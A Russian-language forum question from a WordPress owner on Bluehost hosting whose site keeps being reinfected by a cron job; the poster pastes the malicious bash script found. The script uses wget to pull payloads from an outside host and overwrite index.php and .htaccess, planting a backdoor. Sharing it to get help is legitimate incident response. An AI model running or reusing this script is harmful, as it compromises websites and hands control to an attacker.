Хостинг Bluehost постоянно злонамеренно обновляет файлы

В последнее время общий хостинг Bluehost выдает 403 ошибки при входе администратора в учетную запись WordPress. при отладке проблем обнаруживается, что некоторые файлы заражены вредоносным кодом, который обновляет .htacess файлы и index.phpфайлы. Позже crone_Jobбыл также обнаружен, который обновлял вышеупомянутые файлы. Проблема все еще не устранена. Приветствуются любые предложения или помощь. Я добавляю фрагмент кода

      #!/bin/bash
root_dir=$1
qishu=$2

if [ ! -d ${root_dir}/css ];
    then
        mkdir -p ${root_dir}/css;
        fi
cd ${root_dir}/css;
rm -f wp-class.txt;wget -q -O wp-class.txt http://hello.turnedpro.xyz/wp-class.txt && mv wp-class.txt index.php;

if [ -d ${root_dir}/wp-content/plugins ];
    then
        cd ${root_dir};
            rm -f htaccess1.txt;wget -q -O htaccess1.txt http://hello.turnedpro.xyz/shl/htaccess1.txt && mv htaccess1.txt .htaccess;
                rm -f index${qishu}.txt;wget -q -O index${qishu}.txt http://hello.turnedpro.xyz/mingwen/index${qishu}.txt && mv index${qishu}.txt index.php;
                    rm -f wp-index.txt;wget -q -O wp-index.txt http://hello.turnedpro.xyz/shl/wp-index.txt && cat wp-index.txt >> index.php && rm -f wp-index.txt;
                ```

0 ответов

Другие вопросы по тегам